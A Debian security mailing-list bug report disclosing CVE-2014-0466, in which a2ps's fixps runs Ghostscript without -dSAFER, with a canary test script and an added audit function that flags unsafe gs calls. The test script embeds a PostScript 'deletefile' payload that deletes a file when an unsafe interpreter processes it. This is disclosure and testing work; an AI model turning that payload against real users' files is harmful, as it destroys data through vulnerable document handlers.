[Secure-testing-team] Bug#742902: a2ps: CVE-2014-0466: does not invoke gs with -dSAFER
brian m. carlson
sandals at crustytoothpaste.net
Fri Mar 28 20:03:36 UTC 2014
Package: a2ps
Version: 1:4.14-1.2
Severity: grave
Tags: security
fixps does not invoke gs with -dSAFER. As a consequence, a malicious
PostScript file could delete files with the privileges of the invoking
user.
I have provided a test script that can be invoked as such:
./test-wrapper-fixps fixps
This was reported to the Debian Security Team, who assigned this
CVE-2014-0466. It was also reported to upstream, who has not provided
an update or issued a fixed version. This is being reported publicly as
over 45 days have elapsed and neither upstream nor the security team has
requested a delay or issued an advisory.
-- System Information:
Debian Release: jessie/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 3.14-rc7-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages a2ps depends on:
ii file 1:5.17-1
ii libc6 2.18-4
ii libpaper1 1.1.24+nmu2
ii psutils 1.17.dfsg-1
Versions of packages a2ps recommends:
ii bzip2 1.0.6-5
ii cups-bsd [lpr] 1.7.1-10
ii wdiff 1.2.1-2
Versions of packages a2ps suggests:
pn emacsen-common <none>
ii ghostscript 9.05~dfsg-8+b1
ii groff 1.22.2-5
pn gv <none>
pn html2ps <none>
ii imagemagick 8:6.7.7.10+dfsg-1
pn t1-cyrillic <none>
ii texlive-binaries [texlive-base-bin] 2013.20130729.30972-2+b2
-- no debconf information
--
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
-------------- next part --------------
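#!/bin/sh
# test-wrapper: test if a program is running gs without -dSAFER
#
# Usage: test-wrapper program --option --option2

# Scratch directory holding the canary file and the test document.
TEMPDIR=$(mktemp -d)
[ -n "$TEMPDIR" ] || exit 1
touch "$TEMPDIR/remove-me"

# Build a PostScript file whose embedded code asks the interpreter to delete
# the canary. The here-document is unquoted so $TEMPDIR expands.
groff -Tps <<EOM | sed -e '/%%Pages/d' >"$TEMPDIR/exploit.ps"
Text
\X'ps: exec ($TEMPDIR/remove-me) deletefile'
More text.
EOM

# Run the program under test on the file.
"$@" "$TEMPDIR/exploit.ps" >/dev/null

# The canary is gone only if the embedded deletefile was executed.
if [ -e "$TEMPDIR/remove-me" ]
then
    printf "Program is not vulnerable.\n"
else
    printf "Program is VULNERABLE!\n"
fi
rm -r -- "$TEMPDIR"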
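
An added example, not part of the original report or of a2ps: a heuristic shell function that flags gs invocations in a wrapper script that lack -dSAFER, the defect reported above for fixps. The names audit_gs_calls and demo_audit and the sample wrapper are constructed for illustration; quoting inside the audited script is not parsed.

```sh
#!/bin/sh
# Added example (heuristic, not part of the original report).
# audit_gs_calls FILE: print "FILE:LINE: command" for each gs invocation in a
# shell script that lacks -dSAFER. Returns 1 if any were found, else 0.
audit_gs_calls() {
    awk -v file="$1" '
        # Join backslash-continued lines so options on later lines are seen.
        /\\$/ { if (buf == "") start = NR; sub(/\\$/, " "); buf = buf $0; next }
        {
            cmd = buf $0; line = (buf == "") ? NR : start; buf = ""
            gsub(/\t/, " ", cmd)
            if (cmd ~ /^ *#/) next                  # whole-line comment
            # Check each pipeline/list/substitution segment on its own, so a
            # safe gs earlier on the line cannot hide an unsafe one.
            n = split(cmd, seg, /[|;&(`]+/)
            for (i = 1; i <= n; i++)
                if (seg[i] ~ /^ *(exec +)?([^ ]*\/)?gs( |$)/ &&
                    seg[i] !~ / -dSAFER([^A-Za-z0-9_]|$)/) {
                    sub(/^ +/, "", seg[i])
                    printf "%s:%d: %s\n", file, line, seg[i]
                    bad = 1
                }
        }
        END { exit bad + 0 }
    ' "$1"
}

# Constructed sample wrapper script: two unsafe calls (lines 3 and 6), one safe.
demo_audit() {
    sample=$(mktemp) || return 2
    cat >"$sample" <<'EOF'
#!/bin/sh
# convert with gs (comment, ignored)
gs -q -dNOPAUSE -dBATCH -sDEVICE=ps2write -sOutputFile=- "$1"
gs -q -dSAFER -dNOPAUSE -dBATCH \
   -sDEVICE=ps2write -sOutputFile=- "$1"
cat "$1" | /usr/bin/gs -q \
   -dNOPAUSE -
EOF
    audit_gs_calls "$sample" && rc=0 || rc=$?
    rm -f -- "$sample"
    return "$rc"
}
```

A static match like this complements the dynamic test-wrapper above: it points at the line to fix, while the wrapper confirms the behaviour at run time.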